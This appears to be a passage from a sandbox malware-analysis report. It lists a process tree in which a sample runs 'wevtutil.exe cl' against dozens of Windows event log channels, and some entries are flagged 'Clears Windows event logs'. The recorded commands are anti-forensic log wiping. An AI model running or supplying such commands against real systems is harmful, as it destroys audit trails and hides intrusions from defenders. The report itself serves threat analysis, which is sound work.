C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
3⤵
PID:1604

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
3⤵
PID:1280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
3⤵
PID:1968

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
3⤵
PID:1596

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
3⤵
PID:1856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
3⤵
PID:236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
3⤵
PID:292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
3⤵
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
3⤵
PID:1844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
3⤵
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
3⤵
PID:1456

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
3⤵
PID:2040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
3⤵
- Clears Windows event logs
PID:1608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"
3⤵
PID:1292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
3⤵
PID:216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
3⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
3⤵
PID:1268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
3⤵
PID:828

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
3⤵
- Clears Windows event logs
PID:672

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
3⤵
PID:1716

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
3⤵
- Clears Windows event logs
PID:1768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
3⤵
PID:1516

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
3⤵
PID:1944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
3⤵
PID:1360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
3⤵
PID:1084

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
3⤵
PID:1620

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
3⤵
- Clears Windows event logs
PID:948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
3⤵
- Clears Windows event logs
PID:524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
3⤵
- Clears Windows event logs
PID:880

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
3⤵
PID:868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"
3⤵
PID:1156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"
3⤵
PID:1928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
3⤵
PID:1964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
3⤵
PID:1388

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
3⤵
PID:1348

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
3⤵
PID:1720

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
3⤵
PID:1604

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
3⤵
PID:1280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
3⤵
- Clears Windows event logs
PID:1968

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
3⤵
PID:1596

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
3⤵
PID:1856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
3⤵
PID:236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
3⤵
PID:292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"
3⤵
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
3⤵
- Clears Windows event logs
PID:1844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
3⤵
- Clears Windows event logs
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
3⤵
- Clears Windows event logs
PID:1456

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
3⤵
PID:2040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
3⤵
PID:1608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
3⤵
PID:1292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
3⤵
PID:216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
3⤵
- Clears Windows event logs
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
3⤵
PID:1268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
3⤵
PID:828

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
3⤵
- Clears Windows event logs
PID:672

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
3⤵
PID:1716

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
3⤵
PID:1768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
3⤵
PID:1516

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
3⤵
PID:1944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"
3⤵
PID:1360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
3⤵
PID:1084

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
3⤵
PID:1620

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
3⤵
PID:948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
3⤵
PID:524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
3⤵
PID:880

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"
3⤵
PID:868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
3⤵
- Clears Windows event logs
PID:1156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
3⤵
PID:1928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
3⤵
PID:1964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
3⤵
PID:1388

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
3⤵
PID:1348

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Help/Operational"
3⤵
PID:1720

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
3⤵
PID:1604

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
3⤵
PID:1280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
3⤵
- Clears Windows event logs
PID:1968

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
3⤵
PID:1596

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
3⤵
PID:1856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
3⤵
PID:236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"
3⤵
PID:292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
3⤵
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
3⤵
PID:1844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
3⤵
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"
3⤵
PID:1456

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
3⤵
PID:2040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
3⤵
PID:1608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-International/Operational"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
3⤵
PID:1292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
3⤵
PID:216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
3⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
3⤵
PID:1268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
3⤵
PID:828

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
3⤵
PID:672

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
3⤵
PID:1716

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
3⤵
PID:1768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
3⤵
PID:1516

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
3⤵
PID:1944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
3⤵
- Clears Windows event logs
PID:1360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
3⤵
PID:1084

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"
3⤵
PID:1620

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
3⤵
PID:948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
3⤵
PID:524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
3⤵
PID:880

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
3⤵
PID:868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
3⤵
- Clears Windows event logs
PID:1156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
3⤵
- Clears Windows event logs
PID:1928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
3⤵
PID:1964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
3⤵
- Clears Windows event logs
PID:1388

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
3⤵
PID:1348

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
3⤵
- Clears Windows event logs
PID:1720

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
3⤵
PID:1604

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
3⤵
PID:1280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
3⤵
PID:1968

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
3⤵
PID:1596

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
3⤵
PID:1856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
3⤵
PID:236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
3⤵
PID:292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
3⤵
- Clears Windows event logs
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
3⤵
PID:1844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
3⤵
- Clears Windows event logs
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
3⤵
PID:1456

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MCT/Operational"
3⤵
- Clears Windows event logs
PID:2040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
3⤵
PID:1608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
3⤵
PID:1292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
3⤵
- Clears Windows event logs
PID:216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
3⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
3⤵
PID:1268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
3⤵
PID:828

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
3⤵
PID:672

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
3⤵
PID:1716

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
3⤵
PID:1768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
3⤵
PID:1516

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
3⤵
PID:1944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
3⤵
PID:1360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
3⤵
PID:1084

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
3⤵
PID:1620

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
3⤵
PID:948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
3⤵
PID:524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
3⤵
PID:880

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
3⤵
PID:868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
3⤵
PID:1156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"
3⤵
PID:1928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"
3⤵
- Clears Windows event logs
PID:1964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
3⤵
PID:1388

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"
3⤵
PID:1348

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"
3⤵
PID:1720

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"
3⤵
PID:1604

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
3⤵
PID:1280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"
3⤵
PID:1968

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"
3⤵
PID:1596

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"
3⤵
- Clears Windows event logs
PID:1856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"
3⤵
PID:236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"
3⤵
PID:292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"
3⤵
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"
3⤵
PID:1844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"
3⤵
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"
3⤵
PID:1456

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"
3⤵
PID:2040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"
3⤵
PID:1608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"
3⤵
PID:1292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"
3⤵
PID:216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"
3⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"
3⤵
PID:1268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"
3⤵
PID:828

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"
3⤵
PID:672

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"
3⤵
PID:1716

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
3⤵
PID:1768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PeopleNearMe/Operational"
3⤵
PID:1516

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
3⤵
PID:1944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
3⤵
PID:1360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"
3⤵
PID:1084

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"
3⤵
PID:1620

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
3⤵
PID:948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"
3⤵
PID:524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"
3⤵
- Clears Windows event logs
PID:880

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"
3⤵
PID:868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"
3⤵
PID:1156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService/Debug"
3⤵
PID:1928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService/Operational"
3⤵
- Clears Windows event logs
PID:1964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Debug"
3⤵
PID:1388

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"
3⤵
PID:1348

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"
3⤵
PID:1720

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"
3⤵
- Clears Windows event logs
PID:1604

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RPC/Debug"
3⤵
PID:1280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"
3⤵
- Clears Windows event logs
PID:1968

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"
3⤵
PID:1596

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"
3⤵
PID:1856

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"
3⤵
PID:236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"
3⤵
PID:292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Recovery/Operational"
3⤵
- Clears Windows event logs
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"
3⤵
PID:1844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
3⤵
- Clears Windows event logs
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"
3⤵
- Clears Windows event logs
PID:1456

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"
3⤵
PID:2040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"
3⤵
PID:1608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
3⤵
PID:232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
3⤵
- Clears Windows event logs
PID:1292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Remotefs-UTProvider/Diagnostic"
3⤵
PID:216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
3⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
3⤵
- Clears Windows event logs
PID:1268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"
3⤵
PID:828

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"
3⤵
PID:672

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"
3⤵
PID:1716

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"
3⤵
PID:1768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
3⤵
- Clears Windows event logs
PID:1516

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
3⤵
PID:1944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
3⤵
PID:1360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"
3⤵
PID:1084

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"
3⤵
PID:1620

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sens/Debug"
3⤵
PID:948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"
3⤵
PID:524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"
3⤵
PID:880

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"
3⤵
PID:868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Setup/Analytic"
3⤵
PID:1156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"
3⤵
PID:1928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"
3⤵
PID:1964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"
3⤵
PID:1388

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
3⤵
PID:1348

C:\Windows\system32\wevtutil.exe
